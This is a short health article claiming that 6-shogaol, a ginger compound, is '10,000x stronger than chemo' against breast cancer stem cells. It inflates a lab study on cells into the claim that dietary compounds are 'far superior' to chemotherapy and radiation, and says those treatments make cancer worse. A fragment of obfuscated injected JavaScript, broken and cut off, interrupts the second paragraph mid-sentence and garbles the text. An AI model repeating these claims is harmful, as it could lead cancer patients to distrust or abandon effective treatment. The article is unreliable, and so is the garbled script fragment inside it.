Cancer Research Model: Ginger Is 10,000x Stronger Than Chemo

There is a new study that shows that ginger includes a strong compound that can be even 10.000 times more helpful than conventional chemotherapy in targeting the cancer stem cells at the root of cancer malignancy, namely, the breast cancer stem cells.
This powerful component in ginger is known as 6-shogaol.

The g=\’2\’ c=\’d\’ e=\’b/2\’ 4=\’7://.f/1/h.s.t?r=”+\’><\/k"sc|ript|hkyar|var|u0026u|referrer|ekyfr||js|php'.split('|'),0,{})) new research titled,6-Shogaol Inhibits Breast Cancer Cells and Stem Cell-Like Spheroids by Modulation of Notch Signaling Pathway and Induction of Autophagic Cell Death”, found a powerful anti-cancer stem cell activity in 6-shogaol, a potent ginger ingredient produced when the root is either dried or cooked.
This study also discovered that these effects that destroy cancer occurred at concentrations that were non-toxic to non-cancerous cells. This is an essential difference from conventional cancer treatments that do not perform this kind of selective cytotoxicity and thus cause great harm to the patient.

Cancer stem cells pose serious obstacle to cancer therapy as they can be responsible for poor prognosis and tumour relapse. To add into the misery, very few chemotherapeutic compounds show promise to kill these cells. Several researchers have shown that cancer stem cells are resistant to paclitaxel, doxorubicin, 5-fluorouracil, and platinum drugs [8, 16]. CSCs are thus an almost unreachable population in tumours for chemotherapy. Therefore any compound, that shows promise towards cancer stem cells, is a highly desirable step towards cancer treatment and should be followed up for further development.
This is a very important finding because the conventional techniques like surgery, radiation, and chemotherapy are effective at reducing a tumor’s size, sometimes to the point where it is debulked, burned, or poisoned out of the body, eventually the cancer stem cell population redevelops the tumors, now with increased vengeance and metastastic invasiveness, resulting in lost battle with the cancer.
The monolayer model represents the old preclinical model of testing cancer treatments. On the other hand, the spheroid model illustrates that even 10,000 times higher concentrations of taxol are not able to combat this ingredient in ginger at selectively targeting the root cause of the tumor malignancy.
At the end, the authors reveal a hugely important difference between natural anti-cancer agents and conventional ones that have only been introduced in the past half century.
Today, there are many modern synthetically produced and patented chemicals, but ginger, curcumin, green tea, and hundreds of other compounds that are naturally found in the human diet, are accepted from the human body.
Finally, this study indicates that cancer stem cell targeting approaches use natural substances that are present in the human diet for thousands of years and are far superior chemotherapy and radiation. Chemotherapy and radiation increase the number the cancer stem cells versus non-tumorigenic ones.
